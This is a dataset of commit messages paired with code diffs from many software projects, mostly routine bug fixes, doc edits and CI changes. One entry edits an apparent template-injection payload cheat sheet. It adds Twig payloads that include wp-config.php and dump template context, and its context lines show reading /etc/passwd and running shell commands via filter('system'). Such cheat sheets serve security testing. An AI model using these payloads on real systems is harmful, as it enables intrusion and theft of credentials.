Dataset columns: message (string, lengths 13-484), diff (string, lengths 38-4.63k)
llvm/cuda: Clarify handling of kernel parameters. Remove duplicate is_comp_run checks.
@@ -392,10 +392,11 @@ def _gen_cuda_kernel_wrapper_module(function): # Runs need special handling. data_in and data_out are one dimensional, # but hold entries for all parallel invocations. + # comp_state, comp_params, comp_data, comp_in, comp_out, #trials, #inputs is_comp_run = len(args) == 7 if is_comp_run: - runs_count = args[5] - input_count = args[6] + runs_count = builder.load(args[5]) + input_count = builder.load(args[6]) for i, arg in enumerate(args): # Don't adjust #inputs and #trials @@ -406,10 +407,10 @@ def _gen_cuda_kernel_wrapper_module(function): if i >= 5: offset = ir.IntType(32)(0) # data arrays need special handling - elif is_comp_run and i == 4: # data_out - offset = builder.mul(global_id, builder.load(runs_count)) - elif is_comp_run and i == 3: # data_in - offset = builder.mul(global_id, builder.load(input_count)) + elif i == 4: # data_out + offset = builder.mul(global_id, runs_count) + elif i == 3: # data_in + offset = builder.mul(global_id, input_count) elif is_grid_evaluate: # all but #2 and #3 are shared if i != 2 and i != 3:
Bug fix: records.values() was consuming the response, resulting in nothing to return. Changed to records.peek().
@@ -37,7 +37,7 @@ class NeoTransformer(Transformer): with self.driver.session() as session: for i in itertools.count(1): records = session.read_transaction(query, pageSize=size, pageNumber=i) - if len(records.values()) > 0: + if records.peek() != None: yield records else: return @@ -72,7 +72,6 @@ class NeoTransformer(Transformer): """ Load node from a neo4j record """ - node=node_record[0] attributes = {
Update verifier.yml: instead of "goss", use the (variable) "{{ goss_dst }}", which can always be found. Solves
register: test_files - name: Execute Goss tests - command: "goss -g {{ item }} validate --format {{ goss_format }}" + command: "{{ goss_dst }} -g {{ item }} validate --format {{ goss_format }}" register: test_results with_items: "{{ test_files.stdout_lines }}" ignore_errors: true
workloads/hackbench: fixes. Only install/uninstall the executable once per run. Add results file as a raw artifact.
@@ -18,6 +18,7 @@ import os import re from wa import Workload, Parameter, Executable +from wa.utils.exec_control import once timeout_buffer = 10 @@ -58,32 +59,38 @@ class Hackbench(Workload): binary_name = 'hackbench' - def setup(self, context): - self.command = '{} -s {} -g {} -l {} {} > {}' - self.target_binary = None - self.hackbench_result = self.target.get_workpath(hackbench_results_txt) - self.run_timeout = self.duration + timeout_buffer - + @once + def initialize(self, context): host_binary = context.resolver.get(Executable(self, self.target.abi, self.binary_name)) self.target_binary = self.target.install(host_binary) - self.command = self.command.format(self.target_binary, self.datasize, self.groups, - self.loops, self.extra_params, self.hackbench_result) + def setup(self, context): + self.target_output_file = self.target.get_workpath(hackbench_results_txt) + self.run_timeout = self.duration + timeout_buffer + command_format = '{} -s {} -g {} -l {} {} > {}' + self.command = command_format.format(self.target_binary, self.datasize, self.groups, + self.loops, self.extra_params, self.target_output_file) def run(self, context): self.target.execute(self.command, timeout=self.run_timeout) def extract_results(self, context): - self.target.pull(self.hackbench_result, context.output_directory) + host_output_file = os.path.join(context.output_directory, hackbench_results_txt) + self.target.pull(self.target_output_file, host_output_file) + context.add_artifact('hackbench-results', host_output_file, kind='raw') def update_output(self, context): - with open(os.path.join(context.output_directory, hackbench_results_txt)) as hackbench_file: - for line in hackbench_file: + results_file = context.get_artifact_path('hackbench-results') + with open(results_file) as fh: + for line in fh: for label, (regex, units) in regex_map.iteritems(): match = regex.search(line) if match: context.add_metric(label, float(match.group(1)), units) def teardown(self, context): + self.target.execute('rm -f {}'.format(self.target_output_file)) + + @once + def finalize(self, context): self.target.uninstall(self.binary_name) - self.target.execute('rm -f {}'.format(self.hackbench_result))
Adding troubleshooting for Docker timeout. Reference: I split troubleshooting into performance and fetch sections.
@@ -27,7 +27,10 @@ This integration was integrated and tested with version 7.3.2 of QRadar. 4. Click **Test** to validate the URLs, token, and connection. -## Troubleshooting Performance Issues +## Troubleshooting +This section provides information for troubleshooting performance and fetching issues. + +### Performance Issues In some cases, you might encounter performance issues when running QRadar AQL queries from Demisto. This issue is caused by QRadar API limitations. We recommend that you test the QRadar API performance by running several cURL scripts. #### 1. Creating a search Run the following command to use the QRadar API to create a new search.Save the QUERY ID that is attached to the response for the next step. @@ -40,6 +43,11 @@ Use the following command to use the QRadar API to check the query status (EXECU curl -H "SEC: <API KEY>" -X GET <QRADAR INSTANCE>/api/ariel/searches?<QUERY ID> ``` +### Fetching Issues +If the integration fails to fetch with on a Docker timeout error and the enrichment is enabled within the integration configuration, the cause might be releated to a permissions issue with the enrichment. + +Adding the following advanced parameter might resolve this issue: `DOMAIN_ENRCH_FLG=False` + ## Using API Token authentication In order to use the integration with an API token you'll first need to change the `Username / API Key (see '?')` field to `_api_token_key`. Following this step, you can now enter the API Token into the `Password` field - this value will be used as an API key.
Update tests/test_decompositions.py: ensures that the unittest method uses the SF test suite default tolerance.
@@ -143,7 +143,7 @@ class DecompositionsModule(BaseTest): for i in new_tlist: U_rec=dec.T(*i) @ U_rec U_rec = np.diag(new_diags) @ U_rec - self.assertAlmostEqual(np.linalg.norm(U_rec-U), 0) + self.assertAlmostEqual(np.linalg.norm(U_rec-U), 0, delta=self.tol) def test_williamson_BM_random_circuit(self):
Minor: don't reinvent mapcat. Reuse funcy's one.
@@ -920,16 +920,13 @@ class ResolvedExpression(object): :rtype: list[ResolvedExpression] """ - def mapcat(seq, map_fn): - return sum([map_fn(v) for v in seq], []) - def explore(values): if values is None: return [] elif isinstance(values, list): - return mapcat(values, explore) + return funcy.mapcat(explore, values) elif isinstance(values, dict): - return mapcat(values.values(), explore) + return funcy.mapcat(explore, values.values()) elif filter(values): return [values] else:
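A minimal sketch (assuming the `funcy` package is available) of what `funcy.mapcat` does: it maps a function over a sequence and concatenates the resulting sequences, which is what the removed local helper re-implemented.

```python
# Hedged illustration; wrapping in list() works whether mapcat returns a list
# or a lazy iterator, depending on the funcy version.
import funcy

def duplicate(v):
    return [v, v]

assert list(funcy.mapcat(duplicate, [1, 2, 3])) == [1, 1, 2, 2, 3, 3]
```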
Fixed pathing. Fixed pathing to venv and requirements.txt files.
@@ -62,7 +62,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -70,8 +69,8 @@ jobs: - name: Run the CI run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester echo "github.event.issue.pull_request : [${{ github.event.issue.pull_request }}]" echo "github.event.pull_request.number : [${{ github.event.pull_request.number }}]" echo "steps.vars.outputs.branch : [${{ steps.vars.outputs.branch }}]" @@ -156,7 +155,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -164,10 +162,11 @@ jobs: - name: Run the CI run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester + - python3 detection_testing_execution.py run -c prior_config/${{ matrix.manifest_filename}} + python detection_testing_execution.py run -c prior_config/${{ matrix.manifest_filename}} - name: Upload Test Results Files @@ -259,7 +258,6 @@ jobs: - name: Install Python Dependencies run: | - cd bin/docker_detection_tester python -m venv .venv source .venv/bin/activate python -m pip install wheel @@ -267,8 +265,8 @@ jobs: - name: Merge Detections into single File run: | - cd bin/docker_detection_tester source .venv/bin/activate + cd bin/docker_detection_tester python summarize_json.py --files results_*/summary.json --output_filename summary_test_results.json
Update auth.py: bcrypt.hashpw needs encoded string.
@@ -29,7 +29,7 @@ def confirm_password(attempt, password_hash): attempt: the password attempt password_hash: the real password pash """ - return bcrypt.hashpw(attempt, password_hash) == password_hash + return bcrypt.hashpw(attempt.encode('utf-8'), password_hash) == password_hash @log_action def login(username, password):
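A small standalone sketch of why the encode is needed: `bcrypt.hashpw` only accepts bytes, so a plain `str` attempt has to be encoded first (assumes the `bcrypt` package; the names here are illustrative, not the project's actual module).

```python
import bcrypt

# Hash a password once; gensalt()/hashpw() both operate on bytes.
password_hash = bcrypt.hashpw("secret".encode("utf-8"), bcrypt.gensalt())

def confirm_password(attempt, password_hash):
    # Encoding the str attempt avoids the TypeError bcrypt raises for unicode input.
    return bcrypt.hashpw(attempt.encode("utf-8"), password_hash) == password_hash

assert confirm_password("secret", password_hash)
assert not confirm_password("wrong", password_hash)
```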
qt bump fee: rename "Final" checkbox to "Keep Replace-By-Fee enabled". Now that the checkbox is hidden behind an advanced option, there is no need to be brief about it; better to be explicit. (Terminology unchanged for kivy.)
@@ -115,20 +115,21 @@ class _BaseRBFDialog(WindowModalDialog): vbox.addWidget(adv_widget) def _add_advanced_options(self, adv_vbox: QVBoxLayout) -> None: - self.cb_is_final = QCheckBox(_('Final')) - adv_vbox.addWidget(self.cb_is_final) + self.cb_rbf = QCheckBox(_('Keep Replace-By-Fee enabled')) + self.cb_rbf.setChecked(True) + adv_vbox.addWidget(self.cb_rbf) def run(self) -> None: if not self.exec_(): return - is_final = self.cb_is_final.isChecked() + is_rbf = self.cb_rbf.isChecked() new_fee_rate = self.feerate_e.get_amount() try: new_tx = self.rbf_func(new_fee_rate) except Exception as e: self.window.show_error(str(e)) return - new_tx.set_rbf(not is_final) + new_tx.set_rbf(is_rbf) tx_label = self.wallet.get_label_for_txid(self.txid) self.window.show_transaction(new_tx, tx_desc=tx_label) # TODO maybe save tx_label as label for new tx?? @@ -163,8 +164,9 @@ class BumpFeeDialog(_BaseRBFDialog): ) def _add_advanced_options(self, adv_vbox: QVBoxLayout) -> None: - self.cb_is_final = QCheckBox(_('Final')) - adv_vbox.addWidget(self.cb_is_final) + self.cb_rbf = QCheckBox(_('Keep Replace-By-Fee enabled')) + self.cb_rbf.setChecked(True) + adv_vbox.addWidget(self.cb_rbf) self.strat_combo = QComboBox() options = [
[bugfix] Use collections.abc.Mapping for MonthNames class. typing.Mapping has no items() method in Python 3.5.0.
import calendar import datetime import re -from collections import defaultdict -from collections.abc import MutableMapping + +from collections import abc, defaultdict from contextlib import suppress from functools import singledispatch from string import digits as _decimalDigits # noqa: N812 @@ -553,7 +553,7 @@ def _make_parameter(decoder: decoder_type, param: int) -> str: # This is useful when trying to decide if a certain article is a localized date # or not, or generating dates. # See dh() for additional information. -class MonthNames(Mapping[str, Callable[[int], str]]): +class MonthNames(abc.Mapping): """A Mapping which reads month names from MediaWiki messages.""" @@ -590,7 +590,7 @@ class MonthNames(Mapping[str, Callable[[int], str]]): return len(self.months) -class MonthFormat(MutableMapping): # type: ignore[type-arg] +class MonthFormat(abc.MutableMapping): # type: ignore[type-arg] """A Mapping which creates months formats."""
visitors (CGen): except -> except AttributeError. Also fixes docs.
@@ -128,7 +128,7 @@ class CGen(Visitor): """ def _args_decl(self, args): - """Convert an iterable of :class:`Argument` into cgen format.""" + """Generate cgen declarations from an iterable of symbols and expressions.""" ret = [] for i in args: if i.is_Object: @@ -145,10 +145,8 @@ class CGen(Visitor): return ret def _args_call(self, args): - """ - Convert an iterable of symbols and expressions into a function - call signature in cgen format. - """ + """Generate cgen function call arguments from an iterable of symbols and + expressions.""" ret = [] for i in args: try: @@ -160,7 +158,7 @@ class CGen(Visitor): ret.append(i.name) elif i.is_TensorFunction: ret.append('%s_vec' % i.name) - except: + except AttributeError: ret.append(ccode(i)) return ret
doc: BFV instances and IsolatedHostsFilter. Since BFV instances don't have a specific image attached to them, the filter will consider them as not having a specific image, hence not isolated. Correcting the doc.
@@ -508,6 +508,12 @@ isolated hosts, and the isolated hosts can only run isolated images. The flag ``restrict_isolated_hosts_to_isolated_images`` can be used to force isolated hosts to only run isolated images. +The logic within the filter depends on the +``restrict_isolated_hosts_to_isolated_images`` config option, which defaults +to True. When True, a volume-backed instance will not be put on an isolated +host. When False, a volume-backed instance can go on any host, isolated or +not. + The admin must specify the isolated set of images and hosts in the ``nova.conf`` file using the ``isolated_hosts`` and ``isolated_images`` configuration options. For example:
Style <pre> tag backgrounds the same as <code>. This makes it consistent with the django-wiki version of the code blocks, which looks neater.
.breadcrumb-section { padding: 1rem; } + +pre { + /* + * Style it the same as the <code> tag, since highlight.js does not style + * backgrounds of <pre> tags but bulma does, resulting in a weird off-white + * border. + */ + background-color: #282c34; +}
Pin pandas to < 1.1.0. pandas 1.1.0 has breaking changes to its styling code. We're temporarily pinning to < 1.1.0, and have an open issue to fix this here:
@@ -37,7 +37,10 @@ click = ">=7.0" enum-compat = "*" numpy = "*" packaging = "*" -pandas = ">=0.21.0" +# pandas 1.1.0 has breaking changes to its styling code. We're temporarily +# pinning to < 1.1.0, and have an open issue to fix this here: +# https://github.com/streamlit/streamlit/issues/1777 +pandas = ">=0.21.0, <1.1.0" pillow = ">=6.2.0" protobuf = ">=3.6.0" pyarrow = "*"
Changes for NDK23. The arch is no longer used in the URL for NDK23+.
@@ -474,12 +474,13 @@ class TargetAndroid(Target): ext = 'tar.bz2' else: ext = 'zip' - archive = 'android-ndk-r{0}-' + _platform + '-{1}.' + ext + archive = 'android-ndk-r{0}-' + _platform + '{1}.' + ext is_64 = (os.uname()[4] == 'x86_64') else: raise SystemError('Unsupported platform: {}'.format(platform)) architecture = 'x86_64' if is_64 else 'x86' + architecture = '' if _version >= 23 else f'-{architecture}' unpacked = 'android-ndk-r{0}' archive = archive.format(self.android_ndk_version, architecture) unpacked = unpacked.format(self.android_ndk_version)
Remove out-of-date note. The note about DdApiKey being mandatory is out of date and should be removed.
@@ -55,7 +55,7 @@ Datadog recommends creating two separate Terraform configurations: Separating the configurations of the API key and the forwarder means that you don't need to provide the Datadog API key when updating the forwarder. -**Note:** The `DdApiKey` parameter is required by the CloudFormation template, so you need to give it a placeholder value (any value) to apply. To update or upgrade the forwarder in the future, apply the forwarder configuration again. +To update or upgrade the forwarder in the future, apply the forwarder configuration again. #### Sample configuration
Fixes for optional slit operation. Partial (?) fix for GitHub issue - fixes an issue where the code was trying to update the GUI when the GUI was not yet built.
@@ -415,7 +415,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.select_cut(tag) if tag == self._new_cut: self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) # plot cleared in replot_all() if no more cuts self.replot_all() @@ -428,7 +428,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.w.cuts.append_text(self._new_cut) self.select_cut(self._new_cut) self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) # plot cleared in replot_all() if no more cuts self.replot_all() @@ -667,7 +667,7 @@ class Cuts(GingaPlugin.LocalPlugin): self.cuts_plot.clear() self.w.delete_all.set_enabled(False) self.save_cuts.set_enabled(False) - if self.use_slit: + if self.use_slit and self.gui_up: self.save_slit.set_enabled(False) idx = 0 @@ -695,7 +695,7 @@ class Cuts(GingaPlugin.LocalPlugin): if self.use_slit: if self.cutstag != self._new_cut: self._plot_slit() - if self.selected_axis: + if self.selected_axis and self.gui_up: self.save_slit.set_enabled(True) # force mpl redraw @@ -1018,12 +1018,13 @@ class Cuts(GingaPlugin.LocalPlugin): # Check if the old axis is clicked if pos == self.selected_axis: self.selected_axis = None + if self.gui_up: self.save_slit.set_enabled(False) self.redraw_slit('clear') else: self.selected_axis = pos children[pos-1].set_state(tf) - if self.cutstag != self._new_cut: + if (self.cutstag != self._new_cut) and self.gui_up: self.save_slit.set_enabled(True) self._plot_slit()
fix Utils.encode_bytes. No one has encountered this yet, but there was a bug in encode_bytes if ProcHelper.__init__ is called with an input string (that needs to be fixed too).
@@ -12,7 +12,7 @@ def decode_bytes(s): def encode_bytes(s): - return s or s.replace('\n', os.linesep).encode('utf-8') if s is not None else None + return s.replace('\n', os.linesep).encode('utf-8') if s is not None else None # unicode function
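A hedged before/after sketch of the bug: in the old expression, a non-empty `str` short-circuits the `or` and is returned without ever being encoded, while the fixed version always encodes non-None input.

```python
import os

def encode_bytes_old(s):
    # buggy: `s or ...` returns the original str whenever it is non-empty
    return s or s.replace('\n', os.linesep).encode('utf-8') if s is not None else None

def encode_bytes_fixed(s):
    return s.replace('\n', os.linesep).encode('utf-8') if s is not None else None

assert isinstance(encode_bytes_old("hi"), str)   # bug: still a str
assert encode_bytes_fixed("hi") == b"hi"         # fixed: encoded bytes
assert encode_bytes_fixed(None) is None
```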
Correct globus configuration doc subheading level. Previously the configuration section was at the same level as the globus introduction; now it is at the same level as the globus authorization section.
@@ -325,7 +325,7 @@ execute-side file system, because Globus file transfers happen between two Globus endpoints. Globus Configuration -^^^^^^^^^^^^^^^^^^^^ +"""""""""""""""""""" In order to manage where files are staged, users must configure the default ``working_dir`` on a remote location. This information is specified in the :class:`~parsl.executors.base.ParslExecutor` via the ``working_dir`` parameter in the :class:`~parsl.config.Config` instance. For example:
fix datetime format for better understanding. Original: `1017 01:29:34.751[I]LISA.suite`; current: `2020-10-17 01:29:34.751 INFO LISA.suite`
@@ -105,8 +105,8 @@ class LogWriter(object): _get_root_logger = partial(logging.getLogger, DEFAULT_LOG_NAME) _format = logging.Formatter( - fmt="%(asctime)s.%(msecs)03d[%(levelname)-.1s]%(name)s %(message)s", - datefmt="%m%d %H:%M:%S", + fmt="%(asctime)s.%(msecs)03d %(levelname)-.4s %(name)s %(message)s", + datefmt="%Y-%m-%d %H:%M:%S", ) _console_handler = logging.StreamHandler()
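A minimal, self-contained sketch of the new formatter (plain `logging`, not the project's LogWriter class); running it prints a line in the improved style, e.g. `2020-10-17 01:29:34.751 INFO LISA.suite message`.

```python
import logging

handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter(
    fmt="%(asctime)s.%(msecs)03d %(levelname)-.4s %(name)s %(message)s",
    datefmt="%Y-%m-%d %H:%M:%S",
))
logger = logging.getLogger("LISA.suite")
logger.addHandler(handler)
logger.setLevel(logging.INFO)
logger.info("message")  # prints: "<date> <time>.<ms> INFO LISA.suite message"
```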
Make bearing objects picklable. This removes the lambda definition within the _process_coefficients method; since lambda is not picklable, this would cause an error when trying to pickle bearing objects.
@@ -204,7 +204,12 @@ class BearingElement(Element): " must have the same dimension" ) else: - interpolated = lambda x: np.array(coefficient[0]) + interpolated = interpolate.interp1d( + [0, 1], + [coefficient[0], coefficient[0]], + kind='linear', + fill_value="extrapolate", + ) return coefficient, interpolated
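A quick, hedged demonstration of the underlying problem and the workaround: a lambda cannot be pickled, whereas a `scipy.interpolate.interp1d` object representing the same constant coefficient can (assumes numpy/scipy are available; the coefficient value is made up).

```python
import pickle
import numpy as np
from scipy import interpolate

coefficient = [1e6]  # hypothetical constant bearing coefficient

as_lambda = lambda x: np.array(coefficient[0])
try:
    pickle.dumps(as_lambda)
except Exception as exc:
    print("lambda is not picklable:", exc)

# Constant interpolator over [0, 1] with extrapolation, mirroring the fix above.
as_interp = interpolate.interp1d(
    [0, 1], [coefficient[0], coefficient[0]], kind="linear", fill_value="extrapolate"
)
pickle.dumps(as_interp)   # works
print(as_interp(0.3))     # -> 1000000.0
```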
Fix Madara without ajax O_O
@@ -7,10 +7,9 @@ from lncrawl.core.crawler import Crawler logger = logging.getLogger(__name__) search_url = 'https://novelcake.com/?s=%s&post_type=wp-manga' -chapter_list_url = 'https://novelcake.com/wp-admin/admin-ajax.php' -class NovelCake(Crawler): +class NovelCakeCrawler(Crawler): base_url = 'https://novelcake.com/' def search_novel(self, query): @@ -27,10 +26,9 @@ class NovelCake(Crawler): 'url': self.absolute_url(a['href']), 'info': '%s | Rating: %s' % (latest, votes), }) - # end for return results - # end def + def read_novel_info(self): logger.debug('Visiting %s', self.novel_url) @@ -39,7 +37,7 @@ class NovelCake(Crawler): possible_title = soup.select_one('.post-title h1') for span in possible_title.select('span'): span.extract() - # end for + self.novel_title = possible_title.text.strip() logger.info('Novel title: %s', self.novel_title) @@ -53,20 +51,12 @@ class NovelCake(Crawler): ]) logger.info('%s', self.novel_author) - self.novel_id = soup.select_one('#manga-chapters-holder')['data-id'] - logger.info('Novel id: %s', self.novel_id) - - response = self.submit_form(chapter_list_url, data={ - 'action': 'manga_get_chapters', - 'manga': self.novel_id, - }) - soup = self.make_soup(response) - for a in reversed(soup.select(".wp-manga-chapter a")): + for a in reversed(soup.select(".wp-manga-chapter > a")): chap_id = len(self.chapters) + 1 vol_id = 1 + len(self.chapters) // 100 if chap_id % 100 == 1: self.volumes.append({"id": vol_id}) - # end if + self.chapters.append( { "id": chap_id, @@ -75,13 +65,8 @@ class NovelCake(Crawler): "url": self.absolute_url(a["href"]), } ) - # end for - - # end def def download_chapter_body(self, chapter): soup = self.get_soup(chapter['url']) contents = soup.select('.reading-content p') return ''.join([str(p) for p in contents]) - # end def -# end class \ No newline at end of file
Update README.rst: installing all the requirements for this application.
@@ -55,9 +55,17 @@ The SNAP potential comes with this lammps installation. The GAP package for GAP Install all the libraries from requirement.txt file:: - pip install -r requirement.txt + pip install -r requirements.txt (If doesn't works provide the path of requirement.txt file) +For all the requirements above:: + pip install -r requirements-ci.txt + pip install -r requirements-optional.txt + pip install -r requirements-tf.txt + pip install -r requirements.txt + + (If doesn't works provide the path of requirements.txt file) + Usage -----
DOC: add nbsphinx to the doc/conf.py. [NEW] allows for inclusion of Jupyter notebooks in the documentation.
@@ -22,7 +22,11 @@ import sys, os # Add any Sphinx extension module names here, as strings. They can be extensions # coming with Sphinx (named 'sphinx.ext.*') or your custom ones. -extensions = ['sphinx.ext.todo', 'sphinx.ext.doctest', 'sphinx.ext.imgmath'] +extensions = ['sphinx.ext.todo', + 'sphinx.ext.doctest', + 'sphinx.ext.imgmath', + 'nbsphinx', + 'sphinx.ext.mathjax'] # todo_include_todos=True # to expose the TODOs, uncomment this line @@ -33,7 +37,7 @@ templates_path = ['templates'] source_suffix = '.rst' # ignore the cookbook/ensembl.rst file as it's specifically imported -exclude_patterns = ['cookbook/ensembl.rst'] +exclude_patterns = ['cookbook/ensembl.rst', '_build', '**.ipynb_checkpoints'] # The encoding of source files. # source_encoding = 'utf-8'
Update ci.yml. Back to pestpp develop. Added timeout default. Debug false for interim coveralls post.
@@ -10,6 +10,7 @@ jobs: pyemuCI: name: autotests runs-on: ${{ matrix.os }} + timeout-minutes: 120 strategy: fail-fast: false matrix: @@ -113,7 +114,7 @@ jobs: exit 1 fi cp -r bin/$d/. "$HOME/.local/bin/" - git clone -b master --depth 1 https://github.com/usgs/pestpp + git clone -b develop --depth 1 https://github.com/usgs/pestpp cd pestpp mkdir build && cd build if [[ "$RUNNER_OS" == "Windows" ]]; then @@ -167,7 +168,7 @@ jobs: uses: AndreMiras/coveralls-python-action@develop with: parallel: true - debug: true + debug: false flag-name: ${{ matrix.python-version }}-${{ matrix.test-path }} # - name: Coveralls Parallel
refactor: extract_email_id condition. The condition made no sense and could never be True.
@@ -85,10 +85,7 @@ def get_formatted_email(user, mail=None): def extract_email_id(email): """fetch only the email part of the Email Address""" - email_id = parse_addr(email)[1] - if email_id and isinstance(email_id, str) and not isinstance(email_id, str): - email_id = email_id.decode("utf-8", "ignore") - return email_id + return cstr(parse_addr(email)[1]) def validate_phone_number_with_country_code(phone_number: str, fieldname: str) -> None:
Improve code completion performance (meta control of `MultiColumnCompletionsMenu`). Improve rendering performance of the "meta" control of the `MultiColumnCompletionsMenu` when there are many completions.
@@ -709,7 +709,19 @@ class _SelectedCompletionMetaControl(UIControl): app = get_app() if app.current_buffer.complete_state: state = app.current_buffer.complete_state - return 2 + max(get_cwidth(c.display_meta_text) for c in state.completions) + + if len(state.completions) >= 30: + # When there are many completions, calling `get_cwidth` for + # every `display_meta_text` is too expensive. In this case, + # just return the max available width. There will be enough + # columns anyway so that the whole screen is filled with + # completions and `create_content` will then take up as much + # space as needed. + return max_available_width + + return 2 + max( + get_cwidth(c.display_meta_text) for c in state.completions[:100] + ) else: return 0
Fix environment temperature dash. HG-- branch : feature/microservices
] ], "refId": "A", - "measurement": "{{graph}} on slot $tag_slot", - "alias": "{{graph}}" + "measurement": "{{graph}}", + "alias": "{{graph}} on slot $tag_slot" } ], "datasource": null,
Form helper path based on current module path rather than pwd. Fixes an issue which was introduced by new tests in PR: as introduced, those new tests only worked if run from the root of the parsl source tree.
# executors. import importlib +import pathlib import parsl from functools import partial @@ -41,7 +42,8 @@ def test_check_import_module_function_partial(): def test_check_importlib_function(): - spec = importlib.util.spec_from_file_location("dynamically_loaded_module", "parsl/tests/callables_helper.py") + helper_path = pathlib.Path(__file__).parent / "callables_helper.py" + spec = importlib.util.spec_from_file_location("dynamically_loaded_module", helper_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) some_aux_func = module.some_aux_func @@ -49,7 +51,8 @@ def test_check_importlib_function(): def test_check_importlib_function_partial(): - spec = importlib.util.spec_from_file_location("dynamically_loaded_module", "parsl/tests/callables_helper.py") + helper_path = pathlib.Path(__file__).parent / "callables_helper.py" + spec = importlib.util.spec_from_file_location("dynamically_loaded_module", helper_path) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) some_aux_func = module.some_aux_func
Add classifier: Hydrology. Include the PyPI classifier "Topic :: Scientific/Engineering :: Hydrology" following
@@ -87,6 +87,7 @@ setup( "Intended Audience :: Science/Research", "Topic :: Scientific/Engineering", "Topic :: Scientific/Engineering :: Atmospheric Science", + "Topic :: Scientific/Engineering :: Hydrology", "License :: OSI Approved :: BSD License", "Programming Language :: Python :: 3", "Operating System :: OS Independent",
Twig in WordPress. Was very unsuccessful with the given Twig examples: quotes were escaped and so became invalid, and file_excerpt threw an error, too. Using include and also injecting the file name helped. Don't know if this is a WordPress thing...
@@ -775,6 +775,7 @@ Execute code using SSTI for Slim engine. {{7*7}} {{7*'7'}} would result in 49 {{dump(app)}} +{{dump(_context)}} {{app.request.server.all|join(',')}} ``` @@ -796,6 +797,7 @@ $output = $twig > render ( ```python "{{'/etc/passwd'|file_excerpt(1,30)}}"@ +{{include("wp-config.php")}} ``` ### Twig - Code execution @@ -809,6 +811,12 @@ $output = $twig > render ( {{['cat$IFS/etc/passwd']|filter('system')}} ``` +Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) + +```python +FILENAME{% set var = dump(_context)[OFFSET:LENGTH] %} {{ include(var) }} +``` + Example with an email passing FILTER_VALIDATE_EMAIL PHP. ```powershell
handle autofire hw rules in a switch matrix. Matrix-switch-based hw rules need to have the matrix columns mirrored, since OPP has reverse column order.
@@ -1052,6 +1052,10 @@ class OppHardwarePlatform(LightsPlatform, SwitchPlatform, DriverPlatform): return _, _, coil_num = driver.number.split('-') + + #mirror switch matrix columns to handle the fact that OPP matrix is in reverse column order + switch_num = 8 * (15 - (switch_num // 8)) + switch_num % 8 + msg = bytearray() msg.append(driver.sol_card.addr) msg.extend(OppRs232Intf.SET_SOL_INP_CMD) @@ -1070,6 +1074,10 @@ class OppHardwarePlatform(LightsPlatform, SwitchPlatform, DriverPlatform): if self.min_version[driver.sol_card.chain_serial] < 0x20000: return _, _, coil_num = driver.number.split('-') + + #mirror switch matrix columns to handle the fact that OPP matrix is in reverse column order + switch_num = 8 * (15 - (switch_num // 8)) + switch_num % 8 + msg = bytearray() msg.append(driver.sol_card.addr) msg.extend(OppRs232Intf.SET_SOL_INP_CMD)
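A hedged, standalone illustration of the mirroring arithmetic added above, assuming switch numbers are laid out as 8 rows per column across 16 columns (0-127); only the column index is reversed, the row within the column is kept.

```python
def mirror_matrix_columns(switch_num: int) -> int:
    column, row = switch_num // 8, switch_num % 8
    return 8 * (15 - column) + row

assert mirror_matrix_columns(0) == 120    # column 0, row 0 -> column 15, row 0
assert mirror_matrix_columns(7) == 127    # column 0, row 7 -> column 15, row 7
assert mirror_matrix_columns(127) == 7    # column 15, row 7 -> column 0, row 7
```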
avx512 MASK_AS_CONTROL instr do not get their dest R/W value modified. * This applies to instr like VPBLENDMD where mask is a control value not for merging or zeroing. * Modified the definition of xed_decoded_inst_merging() to return false for instr with XED_ATTRIBUTE_MASK_AS_CONTROL.
@@ -889,6 +889,7 @@ xed_bool_t xed_decoded_inst_merging(const xed_decoded_inst_t* p) { if (xed3_operand_get_mask(p) != 0) # if defined(XED_SUPPORTS_AVX512) if (xed3_operand_get_zeroing(p) == 0) + if (!xed_decoded_inst_get_attribute(p, XED_ATTRIBUTE_MASK_AS_CONTROL)) return 1; # elif defined(XED_SUPPORTS_KNC) return 1; @@ -912,15 +913,18 @@ xed_decoded_inst_operand_action(const xed_decoded_inst_t* p, unsigned int operand_index) { - /* For the 0th operand, except for stores: + /* For the 0th operand, except for stores and except if attribute MASK_AS_CONTROL RW W <<< SDM/XED notion =========================================== + aaa=0 control n/a w aaa=0 merging rw w aaa=0 zeroing n/a n/a - aaa!=0 merging r cw r cw <<< This one requires special handling - aaa!=0 zeroing r w w + aaa!=0 control n/a w + aaa!=0 merging r+cw r+cw <<< This one requires special handling + aaa!=0 zeroing r+w w */ + const xed_inst_t* xi = xed_decoded_inst_inst(p); const xed_operand_t* op = xed_inst_operand(xi,operand_index); xed_operand_action_enum_t rw = xed_operand_rw(op);
Test with a 64-bit after_cursor. Same as but I missed this assertion in the first PR.
@@ -1998,7 +1998,7 @@ def _fetch_counts(storage, after_cursor=None): _fetch_counts(storage, after_cursor=cursor_run1) == materialization_count_by_partition ) - assert _fetch_counts(storage, after_cursor=9999999) == {c: {}, d: {}} + assert _fetch_counts(storage, after_cursor=9999999999) == {c: {}, d: {}} def test_get_observation(self, storage, test_run_id): a = AssetKey(["key_a"])
Update REFERENCES.md: fix the format of the citation.
